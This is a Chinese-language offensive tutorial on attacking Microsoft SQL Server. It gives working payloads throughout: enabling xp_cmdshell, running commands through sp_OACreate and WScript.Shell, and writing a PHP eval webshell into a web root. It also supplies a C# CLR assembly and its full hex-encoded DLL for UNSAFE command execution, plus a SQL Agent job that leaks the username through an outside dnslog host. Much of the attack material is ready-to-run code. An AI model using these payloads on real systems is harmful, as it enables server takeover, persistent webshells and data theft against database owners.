基础知识 Microsoft SQL Server 是微软开发的关系型数据库管理系统(DBMS),它具有极其广泛的用途,可以在各个方面使用,从存储个人博客的内容到存储客户数据等
SQL Server 默认开放的端口是 TCP 1433
我这里测试的版本是Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
首先是一些基础的命令
1 2 3 4 5 6 7 8 9 10 11 12 #查看当前用户名 select user ;#查看版本信息 select @@version ;#查看服务端主机名 select @@servername ;#查看当前数据库名 select db_name();#查看客户端主机名 select host_name();#查看是否是管理员 select is_srvrolemember('sysadmin' );
常见存储过程 存储过程是一组为了完成某个特定功能的SQL语句,一次编译永久生效。然后用户通过指定存储过程的名字以及参数来执行
xp_dirtree 列文件夹、文件:
1 2 execute master.dbo.xp_dirtree 'c:\' ,1 ,1 ;exec xp_dirtree 'c:\' ,1 ,1 ;
xp_dirtree 还可以用来触发 NTLM 请求
后续利用可以创建临时表来读文件
1 2 3 create table files(line varchar (1024 ));bulk insert files from 'c:\windows\win.ini' ; select * from files;
xp_create_subdir 用于创建子目录的存储过程,参数是子目录的路径
1 exec master.sys.xp_create_subdir 'C:\test' ;
xp_availablemedia 用于获得当前所有驱动器
MSSQL命令执行 xp_cmdshell xp_cmdshell 是 Sql Server 中的一个组件,我们可以用它来执行系统命令,任何输出都作为文本返回
利用条件:
当前用户具有 DBA 权限
依赖于 xplog70.dll
sql server 2005版本以后默认关闭,需要开启后使用
1.判断xp_cmdshell是否存在
1 select count (* ) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' ;
返回1表示是存在的
2.启用 xp_cmdshell 存储过程
1 2 3 4 exec sp_configure 'show advanced options' ,1 ;reconfigure; exec sp_configure 'xp_cmdshell' ,1 ;reconfigure;
3.执行系统命令
1 exec master.dbo.xp_cmdshell 'whoami' ;
注意:如果 xp_cmdshell 被删除了,需要自行上传 xplog70.dll 进行恢复 实战中如果出现调用 CreateProcess 失败,一般为拦截了 xp_cmdshell 的调用
SP_OACreate(Ole Automation Procedures) 其实 xp_cmdshell 一般会被删除掉,如果 xp_cmdshell 删除以后,可以使用 SP_OACreate 和 sp_OAMethod 这两个过程,前者可以在 MSSQL 中调用 OLE 对象的实例,后者用来调用 OLE 对象里的方法
利用条件:
当前用户具有 DBA 权限
依赖于 odsole70.dll
1.先判断SP_OACREATE
状态
1 select count (* ) from master.dbo.sysobjects where xtype= 'x' and name= 'SP_OACREATE' ;
如果存在返回1
2.开启组件
1 2 3 4 EXEC sp_configure 'show advanced options' ,1 EXEC sp_configure reconfigureEXEC sp_configure 'Ole Automation Procedures' ,1 EXEC sp_configure reconfigure
3.执行命令,调用WScript.Shell
执行系统命令
ProgID:WScript.Shell CLSID:{72C24DD5-D70A-438B-8A42-98424B88AFB8}
1 2 3 4 5 6 DECLARE @object INT , @object2 INT , @object3 INT , @str VARCHAR (8000 )EXEC sp_OACreate 'WScript.Shell' , @object OUTPUTEXEC sp_OAMethod @object , 'exec' , @object2 OUTPUT, 'C:\Windows\System32\cmd.exe /c whoami' EXEC sp_OAMethod @object2 , 'StdOut' , @object3 OUTPUTEXEC sp_OAMethod @object3 , 'readall' , @str OUTPUTSELECT @str ;
调用FileSystem Object
对象写文件
ProgID:Scripting.FileSystemObject CLSID:{0D43FE01-F093-11CF-8940-00A0C9054228}
1 2 3 4 DECLARE @object INT , @object2 INT EXEC Sp_OACreate 'Scripting.FileSystemObject' , @object OUTPUTEXEC sp_OAMethod @object ,'CreateTextFile' , @object2 OUTPUT, 'C:\phpstudy_pro\WWW\shell.php' , 1 EXEC sp_OAMethod @object2 , 'WriteLine' , NULL , '<?php @eval($_POST[cmd]);?>'
调用ADODB.Stream
对象写文件
ProgID:ADODB.Stream CLSID:{00000566-0000-0010-8000-00AA006D2EA4}
1 2 3 4 5 6 7 8 9 DECLARE @object INT EXEC Sp_OACreate 'ADODB.Stream' , @object OUTPUTEXEC Sp_OASetProperty @object , 'Type' , 1 EXEC sp_OASetProperty @object , 'Mode' , 3 EXEC sp_OAMethod @object , 'Open' , NULL EXEC sp_OAMethod @object , 'Write' , NULL , 0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e EXEC sp_OAMethod @object , 'SaveToFile' , NULL , 'C:\phpstudy_pro\WWW\shell.php' , 2 EXEC sp_OAMethod @object , 'Close' , NULL EXEC sp_OADestroy @object
在知道web绝对路径的情况下,可利用该对象写入webshell,也是解决不出网的一种方式
Common Language Runtime(CLR) Microsoft SQL Server 2005之后,实现了对 Microsoft .NET Framework 的公共语言运行时(CLR)的集成
CLR 集成意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数
利用条件:
启用CLR,并且为了导入不安全的程序集,我们还需要执行以下语句将数据库标记为安全,test 是当前指定的数据库
1 2 3 4 sp_configure 'show advanced options' ,1 ;RECONFIGURE; sp_configure 'clr enabled' ,1 ;RECONFIGURE; ALTER DATABASE [test] SET trustworthy ON
接下来导入CLR,可以利用16进制文件流方式导入DLL文件,不需要文件落地
首先使用 Visual Studio 创建 SQL Server 数据库项目
选择目标平台并勾选创建脚本
根据版本选择对于的目标框架,并设置权限级别为 UNSAFE
在 SQL Server 2005 后引入了从 MSSQL 运行 .NET 代码的功能,并在后续版本中叠加了许多保护措施,来限制代码可以访问的内容,其权限集有三个选项:
SAFE:基本上只将MSSQL数据集暴露给代码,其他大部分操作则都被禁止
EXTERNAL_ACCESS:允许访问底层服务器上某些资源,但不应该允许直接执行代码
UNSAFE:允许执行任何代码
接下来创建 SQL CLR C# 存储过程
写入代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using System.Diagnostics;using System.Text;using Microsoft.SqlServer.Server;public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure ] public static void ExecCommand (string cmd ) { SqlContext.Pipe.Send("Command is running, please wait." ); SqlContext.Pipe.Send(RunCommand("cmd.exe" , " /c " + cmd)); } public static string RunCommand (string filename,string arguments ) { var process = new Process(); process.StartInfo.FileName = filename; if (!string .IsNullOrEmpty(arguments)) { process.StartInfo.Arguments = arguments; } process.StartInfo.CreateNoWindow = true ; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.UseShellExecute = false ; process.StartInfo.RedirectStandardError = true ; process.StartInfo.RedirectStandardOutput = true ; var stdOutput = new StringBuilder(); process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data); string stdError = null ; try { process.Start(); process.BeginOutputReadLine(); stdError = process.StandardError.ReadToEnd(); process.WaitForExit(); } catch (Exception e) { SqlContext.Pipe.Send(e.Message); } if (process.ExitCode == 0 ) { SqlContext.Pipe.Send(stdOutput.ToString()); } else { var message = new StringBuilder(); if (!string .IsNullOrEmpty(stdError)) { message.AppendLine(stdError); } if (stdOutput.Length != 0 ) { message.AppendLine("Std output:" ); message.AppendLine(stdOutput.ToString()); } SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message); } return stdOutput.ToString(); } }
编译后将生产一个 .sql 文件,里面包含了我们后续操作的 SQL 语句:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 CREATE ASSEMBLY [Database1] AUTHORIZATION [dbo] FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103003BA4CE640000000000000000E00022200B013000000E00000006000000000000522C0000002000000040000000000010002000000002000004000000000000000600000000000000008000000002000000000000030060850000100000100000000010000010000000000000100000000000000000000000002C00004F00000000400000A802000000000000000000000000000000000000006000000C000000C82A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000580C000000200000000E000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000342C00000000000048000000020005007C2200004C0800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000A8020000237E000014030000B403000023537472696E677300000000C8060000B4000000235553007C0700001000000023475549440000008C070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D60101000000000006007001BA0206009001BA0206004601A7020F00DA02000006003C03E4010A005A015A020E001503A7020600EB01E40106002C027A0306002B01BA020E00FA02A7020A0086035A020A0023015A020600C401E4010E000302A7020E00D200A7020E004102A70206001402400006002102400006003100E401000000003700000000000100010001001000E9020000150001000100030110000100000015000100040006007003790050200000000096008D007D000100842000000000960099001A0002005C22000000008618A102060004005C22000000008618A102060004006522000000008300160082000400000001007F0000000100F200000002002B03000001003A020000020010030900A10201001100A10206001900A1020A003100A10206005100A102060061001A0110006900A4001500710035031A003900A10206003900F50132007900E50015007100A403370079001D031500790091033C007900C20041007900AE013C00790087023C00790055033C004900A10206008900A1024700390068004D0039004F0353003900FB000600390075025700990083005C003900430306004100B6005C003900A90060002900C2015C0049000F0164004900CB016000A100C2015C00710035036A002900A1020600590056005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000002700000004000000000000000000000070005F000000000004000000000000000000000070004A00000000000400000000000000000000007000E40100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F300044617461626173653100496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468004461746162617365312E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A0020000000BB16613FA9D952408111694C1CBADD5A000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301080100070100000000040100000000000000003BA4CE6400000000020000001C010000E42A0000E40C000052534453F03BE54DA473E142BC80B8462B2377F201000000433A5C55736572735C426D74685C736F757263655C7265706F735C4461746162617365315C4461746162617365315C6F626A5C44656275675C4461746162617365312E70646200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000282C00000000000000000000422C0000002000000000000000000000000000000000000000000000342C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D00650000004400610074006100620061007300650031002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004400610074006100620061007300650031002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000543C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE; GO CREATE PROCEDURE [dbo].[ExecCommand]@cmd NVARCHAR (MAX) NULL AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]GO exec dbo.ExecCommand "whoami";
CLR 利用工具WarSQLKit:https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit
参考:在MSSQL中使用CLR组件提权 MSSQL使用CLR程序集来执行命令
SQL Server Agent Job 代理执行计划任务 SQL Server 代理是一项 Microsoft Windows 服务,它会执行计划的管理任务,这些任务在 SQL Server 中称为作业
利用条件:
拥有 DBA 权限
需要 sqlserver 代理 (sqlagent) 开启
首先启动 SQL Server 代理服务
开启 sqlagent 服务
1 exec master.dbo.xp_servicecontrol 'start' ,'SQLSERVERAGENT' ;
利用计划任务命令执行,由于是无回显,可以使用dnslog外带
1 2 3 4 5 6 use msdb; exec sp_delete_job null ,'test' exec sp_add_job 'test' exec sp_add_jobstep null ,'test' ,null ,'1' ,'cmdexec' ,'cmd.exe /c "ping %USERNAME%.fb7gzla4.dnslog.pw"' exec sp_add_jobserver null ,'test' ,@@servername exec sp_start_job 'test' ;
参考文章:从0开始学习Microsoft SQL Server数据库攻防 mssql 提权总结 Mssql数据库命令执行总结 MSSQL存储过程执行命令 干货 | MSSQL注入和漏洞利用姿势总结